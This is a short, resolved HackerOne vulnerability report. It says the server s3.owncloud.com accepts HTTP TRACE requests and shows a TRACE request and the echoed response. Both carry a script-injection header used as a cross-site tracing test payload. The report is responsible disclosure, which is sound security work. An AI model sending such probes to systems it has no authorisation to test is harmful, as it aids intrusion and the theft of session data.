[s3.owncloud.com] Web Server HTTP Trace/Track Method Support
Unknown
Vulnerability Details
Hello.
Not ineresting bug but you can fixed it as in #83837. (https://hackerone.com/reports/83837)
Request:
TRACE /gxDM8DATHA HTTP/1.1
Host: s3.owncloud.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
via: <script>alert('QualysXSS');</script>
Response:
TRACE /gxDM8DATHA HTTP/1.1
Host: s3.owncloud.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
via: <script>alert('QualysXSS');</script>
Actions
View on HackerOneReport Stats
- Report ID: 90601
- State: Closed
- Substate: resolved
- Upvotes: 2